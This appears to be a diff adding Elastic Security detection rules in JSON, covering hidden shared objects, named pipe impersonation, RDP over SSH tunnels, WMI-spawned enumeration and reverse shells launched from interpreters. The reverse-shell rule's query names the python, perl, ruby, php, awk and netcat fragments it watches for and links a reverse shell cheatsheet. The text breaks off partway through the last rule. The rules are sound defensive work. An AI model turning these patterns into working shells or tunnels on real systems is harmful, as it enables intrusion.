"name": "Creation of Hidden Shared Object File", + "query": "file where host.os.type == \"linux\" and event.type == \"creation\" and file.extension == \"so\" and file.name : \".*.so\" and\nnot process.name == \"dockerd\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "766d3f91-3f12-448c-b65f-20123e9e9e8c", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.001", + "name": "Hidden Files and Directories", + "reference": "https://attack.mitre.org/techniques/T1564/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "766d3f91-3f12-448c-b65f-20123e9e9e8c_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_110.json b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_110.json new file mode 100644 index 00000000000..67e0f942b7b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_110.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a hidden shared object (.so) file. Users can mark specific files as hidden simply by putting a \".\" as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "Creation of Hidden Shared Object File", + "query": "file where host.os.type == \"linux\" and event.type == \"creation\" and file.extension == \"so\" and file.name : \".*.so\" and\nnot process.name == \"dockerd\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "766d3f91-3f12-448c-b65f-20123e9e9e8c", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.001", + "name": "Hidden Files and Directories", + "reference": "https://attack.mitre.org/techniques/T1564/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "766d3f91-3f12-448c-b65f-20123e9e9e8c_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_106.json b/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_106.json new file mode 100644 index 00000000000..18777c7854a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_106.json @@ -0,0 +1,78 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a privilege escalation attempt via rogue named pipe impersonation. An adversary may abuse this technique by masquerading as a known named pipe and manipulating a privileged process to connect to it.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privilege Escalation via Rogue Named Pipe Impersonation", + "query": "file where host.os.type == \"windows\" and event.action : \"Pipe Created*\" and\n /* normal sysmon named pipe creation events truncate the pipe keyword */\n file.name : \"\\\\*\\\\Pipe\\\\*\"\n", + "references": [ + "https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/", + "https://github.com/zcgonvh/EfsPotato", + "https://twitter.com/SBousseaden/status/1429530155291193354" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "76ddb638-abf7-42d5-be22-4a70b0bf7241", + "setup": "## Setup\n\nNamed Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \"contains\" and keyword equal \"pipe\"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "76ddb638-abf7-42d5-be22-4a70b0bf7241_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_9.json b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_9.json new file mode 100644 index 00000000000..d60105dbdc4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_9.json @@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule detects the creation of a shell through a suspicious process chain. Any reverse shells spawned by the specified utilities that are initialized from a single process followed by a network connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Reverse Shell via Suspicious Child Process", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"fork\") and (\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args == \"-e\" and process.args_count >= 3 and \n not process.args == \"-z\") or\n (process.name : \"telnet\" and process.args_count >= 3)\n ) and process.parent.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\",\n \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\")]\n [network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and \n destination.ip != null and not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")]\n", + "references": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "76e4d92b-61c1-4a95-ab61-5fd94179a1ee", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "type": "eql", + "version": 9 + }, + "id": "76e4d92b-61c1-4a95-ab61-5fd94179a1ee_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_109.json b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_109.json new file mode 100644 index 00000000000..d0e989cba7e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_109.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Remote Desktop Tunneling Detected", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Desktop Tunneling Detected\n\nProtocol Tunneling is a mechanism that involves explicitly encapsulating a protocol within another for various use cases, ranging from providing an outer layer of encryption (similar to a VPN) to enabling traffic that network appliances would filter to reach their destination.\n\nAttackers may tunnel Remote Desktop Protocol (RDP) traffic through other protocols like Secure Shell (SSH) to bypass network restrictions that block incoming RDP connections but may be more permissive to other protocols.\n\nThis rule looks for command lines involving the `3389` port, which RDP uses by default and options commonly associated with tools that perform tunneling.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine network data to determine if the host communicated with external servers using the tunnel.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Investigate the command line for the execution of programs that are unrelated to tunneling, like Remote Desktop clients.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Take the necessary actions to disable the tunneling, which can be a process kill, service deletion, registry key modification, etc. Inspect the host to learn which method was used and to determine a response for the case.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n /* RDP port and usual SSH tunneling related switches in command line */\n process.args : \"*:3389\" and\n process.args : (\"-L\", \"-P\", \"-R\", \"-pw\", \"-ssh\")\n", + "references": [ + "https://blog.netspi.com/how-to-access-rdp-over-a-reverse-ssh-tunnel/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "76fd43b7-3480-4dd9-8ad7-8bd36bfad92f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.004", + "name": "SSH", + "reference": "https://attack.mitre.org/techniques/T1021/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_110.json b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_110.json new file mode 100644 index 00000000000..94b331f3a37 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_110.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Remote Desktop Tunneling Detected", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Desktop Tunneling Detected\n\nProtocol Tunneling is a mechanism that involves explicitly encapsulating a protocol within another for various use cases, ranging from providing an outer layer of encryption (similar to a VPN) to enabling traffic that network appliances would filter to reach their destination.\n\nAttackers may tunnel Remote Desktop Protocol (RDP) traffic through other protocols like Secure Shell (SSH) to bypass network restrictions that block incoming RDP connections but may be more permissive to other protocols.\n\nThis rule looks for command lines involving the `3389` port, which RDP uses by default and options commonly associated with tools that perform tunneling.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine network data to determine if the host communicated with external servers using the tunnel.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Investigate the command line for the execution of programs that are unrelated to tunneling, like Remote Desktop clients.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Take the necessary actions to disable the tunneling, which can be a process kill, service deletion, registry key modification, etc. Inspect the host to learn which method was used and to determine a response for the case.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n /* RDP port and usual SSH tunneling related switches in command line */\n process.args : \"*:3389\" and\n process.args : (\"-L\", \"-P\", \"-R\", \"-pw\", \"-ssh\")\n", + "references": [ + "https://blog.netspi.com/how-to-access-rdp-over-a-reverse-ssh-tunnel/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "76fd43b7-3480-4dd9-8ad7-8bd36bfad92f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.004", + "name": "SSH", + "reference": "https://attack.mitre.org/techniques/T1021/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_110.json b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_110.json new file mode 100644 index 00000000000..d5fb2968f84 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_110.json @@ -0,0 +1,142 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies native Windows host and network enumeration commands spawned by the Windows Management Instrumentation Provider Service (WMIPrvSE).", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Enumeration Command Spawned via WMIPrvSE", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.command_line != null and \n process.name:\n (\n \"arp.exe\",\n \"dsquery.exe\",\n \"dsget.exe\",\n \"gpresult.exe\",\n \"hostname.exe\",\n \"ipconfig.exe\",\n \"nbtstat.exe\",\n \"net.exe\",\n \"net1.exe\",\n \"netsh.exe\",\n \"netstat.exe\",\n \"nltest.exe\",\n \"ping.exe\",\n \"qprocess.exe\",\n \"quser.exe\",\n \"qwinsta.exe\",\n \"reg.exe\",\n \"sc.exe\",\n 